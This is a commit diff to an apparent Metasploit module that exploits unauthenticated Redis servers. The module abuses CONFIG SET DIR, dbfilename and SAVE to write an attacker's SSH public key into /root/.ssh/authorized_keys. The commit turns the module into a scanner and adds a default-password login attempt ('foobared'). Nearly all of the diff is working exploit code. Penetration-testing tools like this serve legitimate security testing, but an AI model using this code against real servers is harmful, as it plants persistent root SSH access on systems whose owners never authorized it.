add a password option - AUTH_KEY
nixawk
parent
28bc5b4d4f
commit
42013c18ba
|
|
@ -5,10 +5,11 @@
|
|||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -23,19 +24,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['URL', 'http://antirez.com/news/96'],
|
||||
['URL', 'http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'],
|
||||
['URL', 'http://redis.io/topics/protocol']
|
||||
],
|
||||
'Platform' => %w(unix linux),
|
||||
'Targets' => [['Automatic Target', { }]],
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 11 2015'
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST(),
|
||||
Opt::RPORT(6379),
|
||||
OptPath.new('LocalFile', [true, 'Local file to be uploaded', '/root/.ssh/id_rsa.pub']),
|
||||
OptString.new('RemoteFile', [true, 'Remote file path', '/root/.ssh/authorized_keys'])
|
||||
OptString.new('RemoteFile', [true, 'Remote file path', '/root/.ssh/authorized_keys']),
|
||||
OptString.new('AUTH_KEY', [false, 'Password for redis authentication', 'foobared'])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
|
|
@ -48,6 +44,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
datastore['READ_TIMEOUT']
|
||||
end
|
||||
|
||||
def peer
|
||||
"#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
def redis_proto(parts)
|
||||
return if parts.blank?
|
||||
command = "*#{parts.length}\r\n"
|
||||
|
|
@ -63,62 +63,88 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.get_once(-1, read_timeout)
|
||||
end
|
||||
|
||||
def auth?(password)
|
||||
report_service(
|
||||
host: rhost,
|
||||
port: rport,
|
||||
name: 'redis',
|
||||
proto: 'tcp'
|
||||
)
|
||||
|
||||
command = ['AUTH', "#{password}"]
|
||||
data = send_command(command)
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
if data && data.include?('+OK')
|
||||
true
|
||||
else
|
||||
false
|
||||
end
|
||||
end
|
||||
|
||||
def send_file(path, content)
|
||||
report_service(
|
||||
host: rhost,
|
||||
port: rport,
|
||||
name: 'redis',
|
||||
proto: 'tcp'
|
||||
)
|
||||
|
||||
dirname = File.dirname(path)
|
||||
basename = File.basename(path)
|
||||
|
||||
key = Rex::Text.rand_text_alpha(32)
|
||||
command = ['CONFIG', 'SET', 'DIR', "#{dirname}"]
|
||||
data = send_command(command)
|
||||
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
|
||||
command = ['CONFIG', 'SET', 'dbfilename', "#{basename}"]
|
||||
data = send_command(command)
|
||||
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
|
||||
command = ['SET', "#{key}", "#{content}"]
|
||||
data = send_command(command)
|
||||
|
||||
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
print_good("#{rhost}:#{rport}: save file to #{path}")
|
||||
report_note(
|
||||
type: 'redis_unauth_file_upload',
|
||||
host: rhost,
|
||||
port: rport,
|
||||
proto: 'tcp',
|
||||
data: "Save it to #{path} on remote server successfully",
|
||||
)
|
||||
|
||||
command = ['SAVE']
|
||||
data = send_command(command)
|
||||
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
|
||||
command = ['DEL', "#{key}"]
|
||||
data = send_command(command)
|
||||
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
|
||||
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
|
||||
return unless data.include?('+OK')
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
data = send_command(['INFO'])
|
||||
disconnect
|
||||
if data && data.include?('redis_mode')
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
def run_host(ip)
|
||||
begin
|
||||
connect
|
||||
res = send_command(['PING'])
|
||||
print_status("#{peer} - No Response") unless res
|
||||
|
||||
if res && res =~ /PONG/
|
||||
if res =~ /PONG/
|
||||
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
|
||||
send_file(datastore['RemoteFile'], content)
|
||||
elsif res =~ /NOAUTH Authentication required/
|
||||
if auth?(datastore['AUTH_KEY'])
|
||||
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
|
||||
send_file(datastore['RemoteFile'], content)
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Exception => e
|
||||
print_error("Unable to connect: #{e}")
|
||||
print_error("#{e}")
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue